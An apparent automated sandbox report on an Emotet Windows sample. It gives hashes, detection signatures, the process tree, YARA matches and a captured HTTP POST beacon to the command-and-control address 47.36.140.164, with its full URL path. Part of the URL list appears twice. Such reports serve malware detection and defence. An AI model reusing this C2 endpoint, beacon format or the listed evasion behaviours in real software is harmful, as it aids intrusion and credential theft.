Analysis Report QgWIrI5nvn

Overview

General Information

Sample Name: QgWIrI5nvn (renamed file extension from none to exe)
Analysis ID: 317585
MD5: a527ec7a52e66e6850943b4fa64fa2c3
SHA1: e5fc894131067826297d26b8bdad4aa9895992b1
SHA256: 34f1bf9de98302a9b8b0f8fbd53feec40037696e86b76ae3c019b76e2bdb74de

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • QgWIrI5nvn.exe (PID: 4624 cmdline: 'C:\Users\user\Desktop\QgWIrI5nvn.exe' MD5: A527EC7A52E66E6850943B4FA64FA2C3)
    • calc.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\udhisapi\calc.exe MD5: A527EC7A52E66E6850943B4FA64FA2C3)
  • svchost.exe (PID: 4012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1384 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 800 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6252 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6292 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6332 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3228 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.506147931.0000000000611000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.506045325.00000000005F4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.239926495.0000000000831000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.505938111.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author
0.2.QgWIrI5nvn.exe.830000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
1.2.calc.exe.610000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmp | Malware Configuration Extractor: Emotet
Multi AV Scanner detection for submitted file
Source: QgWIrI5nvn.exe | Virustotal: Detection: 52%
Source: QgWIrI5nvn.exe | Metadefender: Detection: 43%
Source: QgWIrI5nvn.exe | ReversingLabs: Detection: 62%
Source: 0.2.QgWIrI5nvn.exe.830000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 1.2.calc.exe.610000.2.unpack | Avira: Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose,0_2_00439132
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00437C5A
Source: C:\Users\user\Desktop\QgWIrI5nvn.exe | Code function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose,0_2_008337E0
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00439132 lstrlenA,FindFirstFileA,FindClose,1_2_00439132
Source: C:\Windows\SysWOW64\udhisapi\calc.exe | Code function: 1_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00437C5A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.5:49720 -> 47.36.140.164:80
Source: Joe Sandbox View | IP Address: 47.36.140.164
Source: Joe Sandbox View | ASN Name: CHARTER-20115US
Source: global traffic | HTTP traffic detected:
POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 47.36.140.164/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJ
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.36.140.164
Content-Length: 4580
Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 47.36.140.164
Source: unknown | HTTP traffic detected:
POST /BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 47.36.140.164/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=------------------PdiMWQ75Db7NqC2aIJ
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.36.140.164
Content-Length: 4580
Cache-Control: no-cache
Source: calc.exe, 00000001.00000002.507116463.0000000002573000.00000004.00000001.sdmp | String found in binary or memory: http://47.36.140.164/BiRnSEbQidy6zY/IHZNRG0LdgOvnHD7h1/LPv7QD8SWPFeI9n/VlM63SymTHHvqch/HEdP9rq3H7Lb/
Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000003.00000002.508684218.00000202E100F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000003.00000002.508237407.00000202E0E50000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000006.00000002.505673263.000001D22A23E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000002.304875218.000001B8A2C52000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.304885191.000001B8A2C61000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000002.304836563.000001B8A2C13000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen6
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000008.00000003.304727348.000001B8A2C41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000008.00000003.304712761.000001B8A2C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000008.00000003.304698673.000001B8A2C49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304881320.000001B8A2C5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000008.00000002.304885191.000001B8A2C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000008.00000003.304678429.000001B8A2C60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000008.00000003.282748250.000001B8A2C31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000008.00000002.304861593.000001B8A2C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: QgWIrI5nvn.exe, 00000000.00000002.239946887.000000000085A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00432EF6 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_00432EF6
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0042F52E GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_0042F52E
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: 1_2_00432EF6 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 1_2_00432EF6
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: 1_2_0042F52E GetKeyState,GetKeyState,GetKeyState,GetKeyState, 1_2_0042F52E

                E-Banking Fraud:

                Yara detected Emotet
                Source: Yara match File source: 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.506147931.0000000000611000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.506045325.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.239926495.0000000000831000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.505938111.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.239911370.0000000000814000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 0.2.QgWIrI5nvn.exe.830000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.calc.exe.610000.2.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe File created: C:\Windows\SysWOW64\udhisapi\
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe File deleted: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.Identifier
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0043456A 0_2_0043456A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040BA2C 0_2_0040BA2C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040FB95 0_2_0040FB95
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_008381B0 0_2_008381B0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00837DD0 0_2_00837DD0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00836500 0_2_00836500
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00837560 0_2_00837560
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00833AF0 0_2_00833AF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00831C90 0_2_00831C90
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00833C10 0_2_00833C10
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00833DF0 0_2_00833DF0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00833E17 0_2_00833E17
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D90FE 0_2_007D90FE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D809E 0_2_007D809E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D568E 0_2_007D568E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D57AE 0_2_007D57AE
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D382E 0_2_007D382E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D996E 0_2_007D996E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D59B5 0_2_007D59B5
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D598E 0_2_007D598E
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_007D9D4E 0_2_007D9D4E
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: 1_2_0043456A 1_2_0043456A
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: 1_2_0040BA2C 1_2_0040BA2C
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: 1_2_0040FB95 1_2_0040FB95
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: String function: 0040D9BC appears 65 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: String function: 0040BF04 appears 94 times
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: String function: 0040EFF6 appears 41 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: String function: 0040D9BC appears 65 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: String function: 0040BF04 appears 94 times
                Source: C:\Windows\SysWOW64\udhisapi\calc.exe Code function: String function: 0040EFF6 appears 41 times
                Source: QgWIrI5nvn.exe Binary or memory string: OriginalFilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240208812.0000000002690000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239888094.00000000007D0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamexwizard.exej% vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.240663521.0000000002DF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe, 00000000.00000002.239758680.0000000000489000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: QgWIrI5nvn.exe Binary or memory string: OriginalFilenameColorBoxSample.EXEV vs QgWIrI5nvn.exe
                Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
                Source: classification engine Classification label: mal92.troj.evad.winEXE@15/5@0/2
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00409468 __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance, 0_2_00409468
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00430785 FindResourceA,LoadResource,LockResource,FreeResource, 0_2_00430785
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_00834F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap, 0_2_00834F20
                Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_01
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: @u@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Command line argument: Hu@ 0_2_007E1BE7
                Source: QgWIrI5nvn.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: QgWIrI5nvn.exe Virustotal: Detection: 52%
                Source: QgWIrI5nvn.exe Metadefender: Detection: 43%
                Source: QgWIrI5nvn.exe ReversingLabs: Detection: 62%
                Source: unknown Process created: C:\Users\user\Desktop\QgWIrI5nvn.exe 'C:\Users\user\Desktop\QgWIrI5nvn.exe'
                Source: unknown Process created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Process created: C:\Windows\SysWOW64\udhisapi\calc.exe C:\Windows\SysWOW64\udhisapi\calc.exe
                Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: Binary string: xwizard.pdb source: QgWIrI5nvn.exe
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0043809A __EH_prolog,LoadLibraryA,GetProcAddress, 0_2_0043809A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040C244 push eax; retn 0040h 0_2_0040C245
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040D9F7 push ecx; ret 0_2_0040DA07
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040BB40 push eax; ret 0_2_0040BB54
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040BB40 push eax; ret 0_2_0040BB7C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exe Code function: 0_2_0040BF04 push eax; ret 0_2_0040BF22
